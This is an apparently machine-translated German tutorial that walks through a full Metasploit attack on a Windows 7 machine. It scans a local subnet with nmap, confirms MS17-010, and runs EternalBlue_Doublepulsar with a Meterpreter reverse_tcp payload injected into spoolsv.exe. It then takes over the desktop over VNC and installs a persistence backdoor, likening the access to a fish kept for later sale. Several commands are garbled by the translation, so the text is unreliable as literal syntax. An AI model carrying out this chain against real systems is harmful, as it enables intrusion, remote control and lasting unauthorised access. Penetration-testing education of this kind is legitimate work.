Da wir das Top 25 beste Kali -Linux -Tool besprochen haben, und wir zuerst Metasploit in die Liste setzen, lassen Sie uns nun Metasploit diskutieren und erfahren. Wir empfehlen Ihnen, mit Metasploit vertraut zu sein.
Metasploit ursprünglich von h erstellt. D Moore im Jahr 2003, bis es am 21. Oktober 2009 von Rapid7 weiter erworben und entwickelt wurde. Metasploit-Framework ist vollständig mit Ruby geschrieben und ist ein Standardpaket, das im Kali-Linux-System installiert ist (und auch fast alle Penetrationstests, denke ich). Es ist ein Lieblings -Kit für Hacker oder Penetrationstester, um Sicherheitslücken zu erforschen, Exploits für Ziele und andere Sicherheitsentwicklung zu entwickeln und auszuführen.
Metasploit wird mit mehreren Ausgaben ausgestattet, die im Allgemeinen in zwei Kategorien unterteilt sind, kostenlose Version und kostenpflichtige Version. Die freien Versionen: Metasploit Framework Community Edition (CLI -basierte Schnittstelle) und Armitage (GUI -basierte Schnittstelle). Die bezahlten Versionen: Metasploit Express, Metasploit Pro und Cobalt Streik (es ähnelt mit Armitage, das von Strategic Cyber LLC bereitgestellt wird).
Mit Metasploit können Benutzer ihren eigenen Exploit -Code erstellen (oder entwickeln), aber mach dir keine Sorgen, wenn du nicht weiß, wie man codiert, Metasploit hat so viele Module und sie werden kontinuierlich aktualisiert. Derzeit hat Metasploit über 1600 Exploits und 500 Nutzlasten. Ein einfacher Weg, um zu verstehen, was Exploits und Nutzlasten sind, ist ein Exploit im Grunde genommen, wie der Angreifer die Nutzlast über das Sicherheitsloch des Zielsystems liefert. Sobald der Angreifer den Exploit gestartet hat, der eine Nutzlast gegen schutzbedürftiges Ziel enthält, dann wird die implementierte Nutzlast (Nutzlast verwendet, um eine Verbindung zum Angreifer zu erreichen, um einen Remote -Zugriff gegen das Zielsystem zu erhalten). In dieser Phase wird der Exploit durchgeführt und wird irrelevant und wird irrelevant.
"Metasploit hackt kein Instant -Tool, es ist ein verrücktes Framework"
In diesem Metasploit -Artikel geht es darum, Penetrationstests gegen ein Zielsystem unter Verwendung des folgenden Flusses durchzuführen:
VORBEREITUNG
Stellen Sie sicher, dass unser Kali Linux die neueste aktualisierte Version hat. In jedem Update werden Verbesserungen vorhanden. Führen Sie die folgenden Befehle aus:
~# APT -Update
~# APT -Upgrade -y
~# APT Dist -Upgrade -y
Sobald unsere Maschine auf dem neuesten Stand ist, beginnen wir jetzt, indem wir die Metasploit -Konsole aufgeben. Typ im Terminal: Typ:
~# msfconsole
Außerdem benötigen Sie einen Texteditor, Gedit oder Leafpad, um einige Informationen auf dem Weg zu sammeln, bevor wir den Angriff zusammenstellen. Identifizieren Sie zunächst Ihre IP -Adresse der drahtlosen Schnittstelle, der IP des Routers und der Netzmaske.
Basierend auf den obigen Informationen notieren wir die IP -Adresse des WLAN1 und der Router und die NetMasket. Die Notiz sollte also so aussehen:
Angreifer IP (Lhost): 192.168.1.56
Gateway / Routers IP: 192.168.1.1
NETMASK: 255.255.255.0 (/24)
Schritt 1: Anfälligkeitsscanning
In der Metasploit -Konsole sammeln wir zuerst Informationen wie Ziel -IP -Adresse, Betriebssystem, geöffnete Ports und die Verwundbarkeit. Mit Metasploit können wir NMAP direkt aus der Konsole ausführen. Basierend auf den obigen Informationen führen Sie diesen Befehl aus, um unsere Aufgabe der Informationssammlung zu erfüllen.
msf> nmap -v 192.168.1.1/24 --Script vuln -pn -o |
Aus dem obigen Befehl haben wir das Ergebnis unten erhalten.
Wir haben ein verletzliches Ziel, das Windows -Betriebssystem ausführt, und das verletzliche ist im SMBV1 -Dienst. Also, um zu notieren.
Ziel -IP (Rhost): 192.168.1.57
Sicherheitsanfälligkeit: Verwundbarkeit der Remotecode-Ausführung in Microsoft SMBV1-Servern (MS17-010)
Schritt 2: Bewertung der Verwundbarkeit
Jetzt kennen wir das Ziel und seine Verwundbarkeit. Überprüfen Sie die Sicherheitsanfälligkeit in der Metasploit -Konsole
Jetzt kennen wir das Ziel und seine Verwundbarkeit. Überprüfen Sie die Sicherheitsanfälligkeit in der Metasploit -Konsole mit dem Hilfsmodul SMB_SCANNER. Führen Sie den folgenden Befehl aus:
msf> uxiliary/scanner/smb/smb_ms17_010 verwenden
MSF Auxiliary (SMB_MS17_010)> Setzen Sie Rhosts [Target IP]
MSF Auxiliary (SMB_MS17_010)> Ausführen
Metasploit ist zuversichtlich über die Verwundbarkeit und zeigt die genaue Windows OS -Edition an. Zum Merkzettel hinzufügen:
Zielbetrieb: Windows 7 Ultimate 7600
Schritt 3: Ausnutzung
Leider hat Metasploit kein Exploit -Modul im Zusammenhang mit dieser Sicherheitsanfälligkeit. Aber keine Sorge, es gibt einen Mann außerhalb des Exponiertens und schrieb den Exploit -Code. Der Exploit ist bekannt, da sie von der NASA initiiert wird. Sie können es von hier aus abrufen oder dem Leitfaden aus dem Tutorial -Video unten folgen, um den Exploit -Code in Ihrem Metasploit -Framework zu installieren.
Sobald Sie den oben genannten Führer befolgt haben (stellen Sie sicher, dass der Pfad dem Tutorial übereinstimmt). Jetzt sind Sie bereit, das Ziel auszunutzen. Führen Sie die folgenden Befehle aus:
Verwenden Sie Exploit/Windows/SMB/EternalBlue_Doublepulsar
Setzen Sie Nutzlast Windows/MeterPreter/Reverse_TCP
Setzen Sie processInject spoolsv.exe
Setzen Sie Rhost 192.168.1.57
Set lhost 192.168.1.56
Ausbeuten
Boom… Der Exploit erfolgreich, wir haben eine Meterpreter -Sitzung erhalten. Wie ich bereits erwähnt habe, wird nach dem Start des Exploits die Nutzlast bereitgestellt, dh hier haben wir Windows/ verwendet/Messgerät/Reverse_tcp.
Schritt 4: Fernzugriff erhalten
Lassen Sie uns die mehr verfügbaren Befehle untersuchen. Geben Sie ein?'(ohne Fragezeichen) und sehen Sie die aufgelisteten verfügbaren Befehle an. Der Stdapi, Systembefehle sind:
Um weitere Informationen zum Zielsystem anzuzeigen, verwenden Siesysinfo' Befehl. Die Ausgabe sollte so aussehen.
Da wir uns früher in den Systemprozess (Spoolsv) injizieren.exe), wir haben Systemprivilegien bekommen. Wir besitzen das Ziel. Wir können mit dem Befehl zum Ziel viel tun. Zum Beispiel könnten wir RDP ausführen oder nur die VNC -Remote einstellen. So führen Sie den Befehl vnc Service ein:
~# rennen Sie VNC
Das Ergebnis sollte der Desktop für Zielmaschine sein, es sieht so aus.
Der wichtigste Teil ist eine Hintertür. Backdooring wird verwendet, um den Zugang zu erhalten. Es ist wie angeln, Sie werfen Ihren Fisch nicht zurück ins Wasser, sobald Sie den Fisch richtig haben, richtig? Sie möchten etwas mit dem Fisch tun, ob Sie es im Kühlschrank für weitere Aktionen sparen möchten, z. B. das Kochen oder Verkauf für Geld.
Messgerät hat diese anhaltende Hintertoor -Funktion. Führen Sie den folgenden Befehl aus und sehen Sie sich die verfügbaren Parameter und Argumente an.
Meterpreter> Laufen Sie Persistenz -h
Wenn Sie mit diesem veralteten Skript nicht vertraut sind, unterliegt das neueste Persistenzmodul unter Post/Windows/Verwalten/Persistenz_Exe. Sie können es selbst weiter erkunden.
Metasploit ist riesig, es ist nicht nur ein Werkzeug, es ist ein Framework. Bedenken Sie, dass es über 1600 Exploits und etwa 500 Nutzlasten verfügt. Ein Artikel ist nur für das Gesamtbild der allgemeinen Verwendung oder Idee geeignet. Aber Sie haben so viel aus diesem Artikel gelernt.
„Je mehr Sie dem Angriffsfluss folgen, desto mehr haben Sie mühelose Herausforderung.”